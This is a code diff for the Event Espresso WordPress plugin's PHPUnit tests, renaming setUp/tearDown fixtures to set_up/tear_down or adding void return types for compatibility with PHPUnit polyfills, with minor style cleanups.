@@ -51,7 +51,7 @@ class DependencyResolverTest extends EspressoPHPUnitFrameworkTestCase
      * @throws InvalidArgumentException
      * @since 4.9.71.p
      */
-    public function setUp()
+    public function setUp(): void
     {
         $this->loader = LoaderFactory::getLoader();
         $this->request_params = [

--- a/tests/testcases/core/services/encryption/Base64EncoderTest.php
+++ b/tests/testcases/core/services/encryption/Base64EncoderTest.php
@@ -27,14 +27,14 @@ class Base64EncoderTest extends TestCase
     protected $rdg;
 
 
-    public function setUp()
+    public function setUp(): void
     {
         parent::setUp();
         $this->setUpDependencies();
     }
 
 
-    public function tearDown()
+    public function tearDown(): void
     {
         $this->b64 = null;
         $this->rdg = null;

--- a/tests/testcases/core/services/encryption/EncryptionKeyManagerTest.php
+++ b/tests/testcases/core/services/encryption/EncryptionKeyManagerTest.php
@@ -40,7 +40,7 @@ class EncryptionKeyManagerTest extends TestCase
     protected $rdg;
 
 
-    public function setUp()
+    public function setUp(): void
     {
         parent::setUp();
         $this->setUpDependencies();
@@ -48,7 +48,7 @@ class EncryptionKeyManagerTest extends TestCase
     }
 
 
-    public function tearDown()
+    public function tearDown(): void
     {
         $this->b64 = null;
         $this->ekm = null;

--- a/tests/testcases/core/services/encryption/openssl/CipherMethodTest.php
+++ b/tests/testcases/core/services/encryption/openssl/CipherMethodTest.php
@@ -39,14 +39,14 @@ class CipherMethodTest extends TestCase
     protected $rdg;
 
 
-    public function setUp()
+    public function setUp(): void
     {
         parent::setUp();
         $this->setUpDependencies();
     }
 
 
-    public function tearDown()
+    public function tearDown(): void
     {
         $this->cmm = null;
         $this->rdg = null;

--- a/tests/testcases/core/services/encryption/openssl/OpenSSLTest.php
+++ b/tests/testcases/core/services/encryption/openssl/OpenSSLTest.php
@@ -54,14 +54,14 @@ class OpenSSLTest extends TestCase
     protected $rdg;
 
 
-    public function setUp()
+    public function setUp(): void
     {
         parent::setUp();
         $this->setUpDependencies();
     }
 
 
-    public function tearDown()
+    public function tearDown(): void
     {
         $this->b64 = null;
         $this->osm1 = null;

--- a/tests/testcases/core/services/loaders/CachingLoaderTest.php
+++ b/tests/testcases/core/services/loaders/CachingLoaderTest.php
@@ -36,7 +36,7 @@ class CachingLoaderTest extends EE_UnitTestCase
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
      */
-    public function setUp()
+    public function set_up()
     {
         remove_all_filters('FHEE__EventEspresso_core_services_loaders_CachingLoader__load__bypass_cache');
         //caching is turned off by default in the parent test case.  For tests in here where we're doing a number of
@@ -48,7 +48,7 @@ class CachingLoaderTest extends EE_UnitTestCase
                 new ObjectIdentifier(new ClassInterfaceCache())
             );
         }
-        parent::setUp();
+        parent::set_up();
     }
 
 

--- a/tests/testcases/core/services/loaders/CoreLoaderTest.php
+++ b/tests/testcases/core/services/loaders/CoreLoaderTest.php
@@ -24,9 +24,9 @@ class CoreLoaderTest extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->test_loader = new CoreLoader(EE_Registry::instance());
     }
 

--- a/tests/testcases/core/services/loaders/LoaderTest.php
+++ b/tests/testcases/core/services/loaders/LoaderTest.php
@@ -24,9 +24,9 @@ class LoaderTest extends EE_UnitTestCase
      * @throws \EventEspresso\core\exceptions\InvalidDataTypeException
      * @throws \EventEspresso\core\exceptions\InvalidInterfaceException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
     }
 
 

--- a/tests/testcases/core/services/loaders/ObjectIdentifierTest.php
+++ b/tests/testcases/core/services/loaders/ObjectIdentifierTest.php
@@ -33,9 +33,9 @@ class ObjectIdentifierTest extends EE_UnitTestCase
      * @throws \EventEspresso\core\exceptions\InvalidInterfaceException
      * @throws \InvalidArgumentException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->object_identifier = LoaderFactory::getLoader()->getShared(
             'EventEspresso\core\services\loaders\ObjectIdentifier'
         );

--- a/tests/testcases/core/services/locators/FqcnLocatorTest.php
+++ b/tests/testcases/core/services/locators/FqcnLocatorTest.php
@@ -31,14 +31,14 @@ class FqcnLocatorTest extends TestCase
      * @since 4.9.80.p
      * @throws InvalidDataTypeException
      */
-    public function setUp()
+    public function setUp(): void
     {
         parent::setUp();
         $this->file_locator = new FqcnLocator();
     }
 
 
-    public function tearDown()
+    public function tearDown(): void
     {
         parent::tearDown();
         unset($this->file_locator);

--- a/tests/testcases/core/services/notices/NoticesContainerTest.php
+++ b/tests/testcases/core/services/notices/NoticesContainerTest.php
@@ -24,9 +24,9 @@ class NoticesContainerTest extends EE_UnitTestCase
     private $notices_container;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->notices_container = new NoticesContainer();
     }
 

--- a/tests/testcases/core/services/request/RequestStackBuilderTest.php
+++ b/tests/testcases/core/services/request/RequestStackBuilderTest.php
@@ -36,9 +36,9 @@ class RequestStackBuilderTest extends EE_UnitTestCase
      * @throws InvalidInterfaceException
      * @throws InvalidArgumentException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->request_stack_builder = $this->loader->getShared(
             'EventEspresso\tests\mocks\core\services\request\RequestStackBuilderMock',
             [$this->loader]

--- a/tests/testcases/core/services/request/RequestStackBuilderTest.php
+++ b/tests/testcases/core/services/request/RequestStackBuilderTest.php
@@ -220,7 +220,11 @@ class RequestStackBuilderTest extends EE_UnitTestCase
         $this->assertCount(1, $notices['attention']);
         $this->assertEquals('General Kenobi!', $notices['attention'][0]);
         $this->assertCount(1, $notices['errors']);
-        $this->assertEquals('Back away! I will deal with this Jedi slime myself!', $notices['errors'][0]);
+        $this->assertEquals(
+            'Back away! I will deal with this Jedi slime myself!',
+            $notices['errors'][0],
+            'notices array: ' . var_export($notices, true)
+        );
         $request_stack->handleResponse();
         $notices = $this->getNotices();
         $this->assertCount(2, $notices['success']);

--- a/tests/testcases/core/services/routing/RouteMatchSpecificationDependencyResolverTest.php
+++ b/tests/testcases/core/services/routing/RouteMatchSpecificationDependencyResolverTest.php
@@ -43,7 +43,7 @@ class RouteMatchSpecificationDependencyResolverTest extends EspressoPHPUnitFrame
      * @throws ReflectionException
      * @throws AssertionFailedError
      */
-    public function setUp()
+    public function setUp(): void
     {
         $this->loader = LoaderFactory::getLoader();
         $this->dependency_map = $this->loader->getShared('EE_Dependency_Map');

--- a/tests/testcases/core/services/routing/RouteMatchSpecificationFactoryTest.php
+++ b/tests/testcases/core/services/routing/RouteMatchSpecificationFactoryTest.php
@@ -34,7 +34,7 @@ class RouteMatchSpecificationFactoryTest extends EspressoPHPUnitFrameworkTestCas
      * @throws InvalidInterfaceException
      * @throws InvalidArgumentException
      */
-    public function setUp()
+    public function setUp(): void
     {
         $this->loader = LoaderFactory::getLoader();
     }

--- a/tests/testcases/misc/WP_Filesystem_permissions_UnitTestCases.php
+++ b/tests/testcases/misc/WP_Filesystem_permissions_UnitTestCases.php
@@ -13,7 +13,7 @@
 class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
 {
 
-    function setUp()
+    function set_up()
     {
         add_filter('filesystem_method_file', array($this, 'filter_abstraction_file'));
         add_filter('filesystem_method', array($this, 'filter_fs_method'));
@@ -22,13 +22,13 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
 
 
 
-    function tearDown()
+    function tear_down()
     {
         global $wp_filesystem;
         remove_filter('filesystem_method_file', array($this, 'filter_abstraction_file'));
         remove_filter('filesystem_method', array($this, 'filter_fs_method'));
         unset($wp_filesystem);
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/misc/WP_Filesystem_permissions_UnitTestCases.php
+++ b/tests/testcases/misc/WP_Filesystem_permissions_UnitTestCases.php
@@ -1,7 +1,6 @@
 <?php
 
 
-
 /**
  * permissions
  *
@@ -12,39 +11,34 @@
  */
 class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
 {
-
     function set_up()
     {
-        add_filter('filesystem_method_file', array($this, 'filter_abstraction_file'));
-        add_filter('filesystem_method', array($this, 'filter_fs_method'));
+        add_filter('filesystem_method_file', [$this, 'filter_abstraction_file']);
+        add_filter('filesystem_method', [$this, 'filter_fs_method']);
         WP_Filesystem();
     }
-
 
 
     function tear_down()
     {
         global $wp_filesystem;
-        remove_filter('filesystem_method_file', array($this, 'filter_abstraction_file'));
-        remove_filter('filesystem_method', array($this, 'filter_fs_method'));
+        remove_filter('filesystem_method_file', [$this, 'filter_abstraction_file']);
+        remove_filter('filesystem_method', [$this, 'filter_fs_method']);
         unset($wp_filesystem);
         parent::tear_down();
     }
 
 
-
-    function filter_fs_method($method)
+    function filter_fs_method($method): string
     {
         return 'MockEEFS';
     }
 
 
-
-    function filter_abstraction_file($file)
+    function filter_abstraction_file($file): string
     {
-        return dirname(dirname(dirname(__FILE__))) . '/includes/mock-ee-fs.php';
+        return dirname(__FILE__, 3) . '/includes/mock-ee-fs.php';
     }
-
 
 
     function test_is_MockFS_sane()
@@ -62,7 +56,6 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
     }
 
 
-
     function test_mkdir()
     {
         global $wp_filesystem;
@@ -74,7 +67,6 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
         $this->assertEquals(WP_Filesystem_MockFS_default_owner, $wp_filesystem->owner($folder_path));
         $this->assertEquals(WP_Filesystem_MockFS_default_group, $wp_filesystem->group($folder_path));
     }
-
 
 
     function test_chmod()
@@ -89,7 +81,6 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
     }
 
 
-
     function test_chown()
     {
         global $wp_filesystem;
@@ -102,7 +93,6 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
     }
 
 
-
     function test_chgroup()
     {
         global $wp_filesystem;
@@ -110,10 +100,9 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
         $folder_path = '/test/';
         $wp_filesystem->mkdir($folder_path);
         $this->assertEquals(WP_Filesystem_MockFS_default_group, $wp_filesystem->group($folder_path));
-        $success = $wp_filesystem->chgrp($folder_path, 'globe-trotters');
+        $wp_filesystem->chgrp($folder_path, 'globe-trotters');
         $this->assertEquals('globe-trotters', $wp_filesystem->group($folder_path));
     }
-
 
 
     function test_is_readable()
@@ -125,7 +114,8 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
         $this->assertEquals(WP_Filesystem_MockFS_default_perms, $wp_filesystem->getchmod($folder_path));
         $this->assertTrue($wp_filesystem->is_readable($folder_path));
         //switch to another user, although they should be able to read it too
-        $other_user_same_group = $wp_filesystem->add_system_user('other_user_same_group', WP_Filesystem_MockFS_default_group);
+        $other_user_same_group  =
+            $wp_filesystem->add_system_user('other_user_same_group', WP_Filesystem_MockFS_default_group);
         $other_user_other_group = $wp_filesystem->add_system_user('other_user_other_group', 'other_group');
         $wp_filesystem->change_current_system_user($other_user_other_group->username);
         $this->assertTrue($wp_filesystem->is_readable($folder_path));
@@ -137,11 +127,10 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
         //and now check the user in the same group can still read...
         $wp_filesystem->change_current_system_user($other_user_same_group->username);
         $this->assertTrue($wp_filesystem->is_readable($folder_path));
-        //..bu tthe user in a differeng group can't
+        //..bu the user in a different group can't
         $wp_filesystem->change_current_system_user($other_user_other_group->username);
         $this->assertFalse($wp_filesystem->is_readable($folder_path));
     }
-
 
 
     function test_is_writable()
@@ -153,7 +142,8 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
         $this->assertEquals(WP_Filesystem_MockFS_default_perms, $wp_filesystem->getchmod($folder_path));
         $this->assertTrue($wp_filesystem->is_writable($folder_path));
         //switch to another user, although they should be able to write it too
-        $other_user_same_group = $wp_filesystem->add_system_user('other_user_same_group', WP_Filesystem_MockFS_default_group);
+        $other_user_same_group  =
+            $wp_filesystem->add_system_user('other_user_same_group', WP_Filesystem_MockFS_default_group);
         $other_user_other_group = $wp_filesystem->add_system_user('other_user_other_group', 'other_group');
         $wp_filesystem->change_current_system_user($other_user_other_group->username);
         $this->assertTrue($wp_filesystem->is_writable($folder_path));
@@ -165,11 +155,8 @@ class WP_Filesystem_permissions_UnitTestCases extends WP_UnitTestCase
         //and now check the user in the same group can still write...
         $wp_filesystem->change_current_system_user($other_user_same_group->username);
         $this->assertTrue($wp_filesystem->is_writable($folder_path));
-        //..bu tthe user in a differeng group can't
+        //..bu the user in a different group can't
         $wp_filesystem->change_current_system_user($other_user_other_group->username);
         $this->assertFalse($wp_filesystem->is_writable($folder_path));
     }
-
 }
-
-

--- a/tests/testcases/modules/EED_Single_Page_Checkout_Test.php
+++ b/tests/testcases/modules/EED_Single_Page_Checkout_Test.php
@@ -25,8 +25,8 @@ class EED_Single_Page_Checkout_Test extends EE_UnitTestCase {
 
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		$this->loadModuleMocks( array( 'EED_Single_Page_Checkout' ) );
 		$this->spco_mock = EED_Single_Page_Checkout_Mock::instance();
 		//add filter on permalink to add some noise
@@ -41,11 +41,11 @@ class EED_Single_Page_Checkout_Test extends EE_UnitTestCase {
 
 
 
-	public function tearDown() {
+	public function tear_down() {
 		EE_Config::instance()->core->reg_page_id = $this->original_reg_page_id;
 		// remove filter on permalink
 		remove_filter( 'page_link', array( $this, 'add_dummy_query_args' ) );
-		parent::tearDown();
+		parent::tear_down();
 	}
 
 

--- a/tests/testcases/modules/EED_Single_Page_Checkout_Test.php
+++ b/tests/testcases/modules/EED_Single_Page_Checkout_Test.php
@@ -1,112 +1,105 @@
-<?php if ( ! defined( 'EVENT_ESPRESSO_VERSION' ) ) {
-	exit( 'No direct script access allowed' );
+<?php
+
+class EED_Single_Page_Checkout_Test extends EE_UnitTestCase
+{
+    /**
+     * Used to hold the EED_Single_Page_Checkout_Mock class.
+     *
+     * @var EED_Single_Page_Checkout_Mock $spco_mock
+     */
+    protected $spco_mock;
+
+    /**
+     * @var int $original_reg_page_id
+     */
+    protected $original_reg_page_id = 0;
+
+    /**
+     * @var int $new_page_id
+     */
+    protected $new_page_id = 0;
+
+
+    public function set_up()
+    {
+        parent::set_up();
+        $this->loadModuleMocks(['EED_Single_Page_Checkout']);
+        $this->spco_mock = EED_Single_Page_Checkout_Mock::instance();
+        //add filter on permalink to add some noise
+        add_filter('page_link', [$this, 'add_dummy_query_args']);
+        // for some reason, whatever the reg_page_id is set on EE_Config is not an actual page in the db.
+        // so we first setup a page and set it as the reg page for the purpose of this test
+        $this->new_page_id = $this->factory->post->create(['post_type' => 'page']);
+        // then swap out existing reg page id with the new one
+        $this->original_reg_page_id              = EE_Config::instance()->core->reg_page_id;
+        EE_Config::instance()->core->reg_page_id = $this->new_page_id;
+    }
+
+
+    public function tear_down()
+    {
+        EE_Config::instance()->core->reg_page_id = $this->original_reg_page_id;
+        // remove filter on permalink
+        remove_filter('page_link', [$this, 'add_dummy_query_args']);
+        parent::tear_down();
+    }
+
+
+    public function add_dummy_query_args($link): string
+    {
+        return add_query_arg(['some_dummy_arg' => 'crazy'], $link);
+    }
+
+
+    /**
+     * because older versions of WP don't have \WP_UnitTestCase::set_permalink_structure()
+     *
+     * @param string $structure
+     */
+    public function set_permalink_structure($structure = '')
+    {
+        global $wp_rewrite;
+        $wp_rewrite->init();
+        $wp_rewrite->set_permalink_structure($structure);
+        $wp_rewrite->flush_rules();
+    }
+
+
+    /**
+     * @group 10220
+     * @group spco
+     */
+    public function test_is_reg_page()
+    {
+        $permalink_structures = [
+            // plain /?p=123
+            'plain'      => '',
+            // Day and name 2016/11/07/sample-post/
+            'day_name'   => '/%year%/%monthnum%/%day%/%postname%/',
+            // Month and name 	http://local.wordpress.dev/2016/11/sample-post/
+            'month_name' => '/%year%/%monthnum%/%postname%/',
+            // Numeric 	http://local.wordpress.dev/archives/123
+            'numeric'    => '/archives/%post_id%',
+            // Post name 	http://local.wordpress.dev/sample-post/
+            'post_name'  => '/%postname%/',
+        ];
+        foreach ($permalink_structures as $permalink_structure) {
+            $this->set_permalink_structure($permalink_structure);
+            // example reg_page_permalink where a plugin or theme adds query params
+            // to links clicked by users for additional functionality that is NOT
+            // generated via filtering get_permalink.
+            $this->go_to(
+                add_query_arg(
+                    [
+                        'utm'      => '5677',
+                        'campaign' => 'analytics_campaign',
+                    ],
+                    get_permalink(EE_Config::instance()->core->reg_page_id)
+                )
+            );
+            //so we SHOULD be on the reg page
+            $this->assertTrue($this->spco_mock->is_reg_checkout());
+        }
+    }
 }
-
-
-
-class EED_Single_Page_Checkout_Test extends EE_UnitTestCase {
-
-	/**
-	 * Used to hold the EED_Single_Page_Checkout_Mock class.
-	 *
-	 * @var EED_Single_Page_Checkout_Mock $spco_mock
-	 */
-	protected $spco_mock;
-
-	/**
-	 * @var int $original_reg_page_id
-	 */
-	protected $original_reg_page_id = 0;
-
-	/**
-	 * @var int $new_page_id
-	 */
-	protected $new_page_id = 0;
-
-
-
-	public function set_up() {
-		parent::set_up();
-		$this->loadModuleMocks( array( 'EED_Single_Page_Checkout' ) );
-		$this->spco_mock = EED_Single_Page_Checkout_Mock::instance();
-		//add filter on permalink to add some noise
-		add_filter( 'page_link', array( $this, 'add_dummy_query_args' ) );
-		// for some reason, whatever the reg_page_id is set on EE_Config is not an actual page in the db.
-		// so we first setup a page and set it as the reg page for the purpose of this test
-		$this->new_page_id = $this->factory->post->create( array( 'post_type' => 'page' ) );
-		// then swap out existing reg page id with the new one
-		$this->original_reg_page_id = EE_Config::instance()->core->reg_page_id;
-		EE_Config::instance()->core->reg_page_id = $this->new_page_id;
-	}
-
-
-
-	public function tear_down() {
-		EE_Config::instance()->core->reg_page_id = $this->original_reg_page_id;
-		// remove filter on permalink
-		remove_filter( 'page_link', array( $this, 'add_dummy_query_args' ) );
-		parent::tear_down();
-	}
-
-
-
-	public function add_dummy_query_args( $link ) {
-		return add_query_arg( array( 'some_dummy_arg' => 'crazy' ), $link );
-	}
-
-
-
-	/**
-	 * because older versions of WP don't have \WP_UnitTestCase::set_permalink_structure()
-	 *
-	 * @param string $structure
-	 */
-	public function set_permalink_structure( $structure = '' ) {
-		global $wp_rewrite;
-		$wp_rewrite->init();
-		$wp_rewrite->set_permalink_structure( $structure );
-		$wp_rewrite->flush_rules();
-	}
-
-
-
-	/**
-	 * @group 10220
-	 * @group spco
-	 */
-	public function test_is_reg_page() {
-		$permalink_structures = array(
-			// plain /?p=123
-			'plain'      => '',
-			// Day and name 2016/11/07/sample-post/
-			'day_name'   => '/%year%/%monthnum%/%day%/%postname%/',
-			// Month and name 	http://local.wordpress.dev/2016/11/sample-post/
-			'month_name' => '/%year%/%monthnum%/%postname%/',
-			// Numeric 	http://local.wordpress.dev/archives/123
-			'numeric'    => '/archives/%post_id%',
-			// Post name 	http://local.wordpress.dev/sample-post/
-			'post_name'  => '/%postname%/',
-		);
-		foreach ( $permalink_structures as $permalink_structure ) {
-			$this->set_permalink_structure( $permalink_structure );
-			// example reg_page_permalink where a plugin or theme adds query params
-			// to links clicked by users for additional functionality that is NOT
-			// generated via filtering get_permalink.
-			$this->go_to(
-				add_query_arg(
-					array(
-						'utm'      => '5677',
-						'campaign' => 'analytics_campaign',
-					),
-					get_permalink( EE_Config::instance()->core->reg_page_id )
-				)
-			);
-			//so we SHOULD be on the reg page
-			$this->assertTrue( $this->spco_mock->is_reg_checkout() );
-		}
-	}
-
-
-}
-// End of file EED_Single_Page_Checkout_Test.php
 // Location: tests/testcases/modules/EED_Single_Page_Checkout_Test.php

--- a/tests/testcases/modules/EED_Ticket_Sales_Monitor_Test.php
+++ b/tests/testcases/modules/EED_Ticket_Sales_Monitor_Test.php
@@ -19,9 +19,9 @@ defined('EVENT_ESPRESSO_VERSION') || exit;
 class EED_Ticket_Sales_Monitor_Test extends EE_UnitTestCase
 {
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         require_once(EE_TESTS_DIR . 'mocks/modules/EED_Ticket_Sales_Monitor_Mock.php');
     }
 

--- a/tests/testcases/modules/EE_CheckoutTest.php
+++ b/tests/testcases/modules/EE_CheckoutTest.php
@@ -17,12 +17,12 @@
 class EE_CheckoutTest extends EE_UnitTestCase {
 
 
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 	}
 
-	public function tearDown(){
-		parent::tearDown();
+	public function tear_down(){
+		parent::tear_down();
 	}
 
 

--- a/tests/testcases/modules/ticket_selector/ProcessTicketSelectorTest.php
+++ b/tests/testcases/modules/ticket_selector/ProcessTicketSelectorTest.php
@@ -39,7 +39,7 @@ class ProcessTicketSelectorTest extends TestCase
     private $request;
 
 
-    public function setUp()
+    public function setUp(): void
     {
         parent::setUp();
         $this->request = new RequestMock();

--- a/tests/testcases/payment_methods/EE_PMT_Aim_Test.php
+++ b/tests/testcases/payment_methods/EE_PMT_Aim_Test.php
@@ -60,8 +60,8 @@ class EE_PMT_Aim_Test extends EE_UnitTestCase{
 			'phone' => '1231231231',
 		);
 	}
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		EE_Payment_Method_Manager::reset();
 	}
 	public function test_do_direct_payment__success(){

--- a/tests/testcases/payment_methods/EE_PMT_Paypal_Pro_Test.php
+++ b/tests/testcases/payment_methods/EE_PMT_Paypal_Pro_Test.php
@@ -70,8 +70,8 @@ class EE_PMT_Paypal_Pro_Test extends EE_UnitTestCase{
 	/**
 	 * setUp
 	 */
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		//EEG_Paypal_Pro uses $_SERVER at some point, so we need to pretend this is a regular request
 		$this->go_to( 'http://localhost/' );
 		//just set a random address

--- a/tests/testcases/payment_methods/EE_PMT_Paypal_Standard_Test.php
+++ b/tests/testcases/payment_methods/EE_PMT_Paypal_Standard_Test.php
@@ -29,8 +29,8 @@ class EE_PMT_Paypal_Standard_Test extends EE_UnitTestCase{
 	const notify_url = 'http://mysite.com/notify';
 	const cancel_url = 'http://mysite.com/cancel';
 
-	public function setUp(){
-        parent::setUp();
+	public function set_up(){
+        parent::set_up();
 		EEM_Payment::reset();
 		EEM_Transaction::reset();
 //		EEM_Payment_Method::reset();


### PR DESCRIPTION
This PR:

- updates text fixture declarations to work with the WP/Yoast PHPUnit polyfills